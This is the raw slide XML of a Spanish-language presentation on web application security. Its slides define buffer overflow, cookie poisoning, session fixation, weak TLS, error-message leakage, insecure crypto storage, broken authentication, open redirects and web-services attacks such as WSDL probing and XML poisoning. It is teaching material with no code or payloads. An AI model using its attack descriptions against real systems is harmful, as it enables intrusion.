              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>cuentas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Enumeración </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>usuarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de registro de usuario.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3642385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Componentes de una aplicación Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Servidor Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Inicio de sesión</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Permisos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>de usuario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Nivel de rol de Seguridad del sistema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>lógica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Contenido </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>de la aplicación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Acceso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>a datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Cierre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Almacenamiento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>de datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Mecanismo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>de rastreo de sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3949149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Ataques Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Overflow</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800" dirty="0" smtClean="0"/>
              <a:t>Ocurren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>cuando una aplicación escribe más datos a un bloque de la memoria, o buffer, que éste pueda soportar. Permite a un atacante modificar el espacio de dirección del proceso del objetivo para controlar la ejecución del proceso, bloquear la memoria y modificar variables internas. Los atacantes modifican punteros de función por la aplicación para dirigir la ejecución del programa a través de saltos o instrucciones de llamada y la apunta a una ubicación en la memoria que contenga código malicioso.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3887428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Cookie/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las cookies son utilizadas para mantener el estado de una sesión en el protocolo HTTP. Este ataque implica la modificación del contenido de una cookie (información personal almacenada en el equipo Web del usuario) para saltar los mecanismos de seguridad. Se inyecta contenido malicioso modificando la experiencia en línea del usuario.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3244654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El acatante engaña al usuario para que acceda a un servidor Web genuino utilizando un valor ID de sesión explícito. El atacante asume la identidad de la víctima y explota sus credenciales en el servidor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataque de fijación de sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2639673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Protección en la capa de transporte insuficiente</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Soporte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>algoritmos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>débiles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Datos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>expuestos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Lanzar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>ataques: La configuración de SSL de bajos privilegios pueden ayudar al atacante a realizar lanzar ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> y MITM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4058899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Manipulación de errores inapropiados</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Da una visión dentro del código fuente como fallas lógicas, cuentas por defecto, etc. Utilizando la información recibida de un mensaje de error, un atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>puede identificar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>vulnerabilidades. Información de BD, ambiente de la aplicación, llamadas del sistema fallidas, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2119171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Almacenamiento criptográfico inseguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Se refiere cuando una aplicación utiliza código de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>encriptación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>pobre en los datos de una BD. Esta falla permite a los atacantes robar o modificar información débilmente protegida como tarjetas de crédito, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>SSNs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2581863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Autenticación roto y administración de sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Un atacante utiliza vulnerabilidades en la autenticación o funciones de administración de sesión como cuentas expuestas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> de sesión, cierre de sesión, administración de contraseñas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>para hacerse pasar por usuarios. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> de sesión en URL, explotación de tiempo de espera, explotación de contraseña.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3793175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Redirecciones y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>renvíos inválidos</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Habilitan a los atacantes instalar malware o engañar a las víctimas en revelar contraseñas u otra información sensible, donde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>renvíos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>no seguros pueden permitir saltos en el control de acceso.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1291357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Ataque a los servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>La evolución de los servicios web ofrece nuevos vectores de ataque en el marco de trabajo de la aplicación. Estos servicios están basados en protocolos XML como Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Definition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> (WSDL) para describir puntos de conexión; Universal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Integration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> (UDDI) para la descripción y descubrimiento de servicios Web; Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> (SOAP) para la comunicación entre los servicios Web que son vulnerables dentro de muchas amenazas de aplicación web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1225465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Pila de los servicios Web</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Capa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Presentación (XML, Ajax, Portal). WSDL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>probing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Inyección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>SQL/LDAP/XPATH/OS malware, fuerza bruta, fuga de información, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Capa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Seguridad (WS-Security). WSDL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>probing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Inyección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>SQL/LDAP/XPATH/OS malware, fuerza bruta, fuga de información, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295677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Aplicaciones Web 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Suponen una revolución en la Web. Blogs, , nuevas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>tecnologías </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>como Ajax (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>), aplicaciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>móviles, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>computing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, online office software, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2876219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Pila de los servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Capa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Descubrimiento (UDDI, WSDL).Ataques de permisos y accesos, ataques de autenticación y certificados, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Capa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Acceso (SOAP, REST).Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Capa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Transporte (HTTP, HTTPS, JMS). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>snooping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, WS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Routing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3993394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Ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> a los Servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes hacen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> a la aplicación web para obtener información de UDDI como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>businessEntity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>bsunesService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>tModel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939061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XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> a los servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
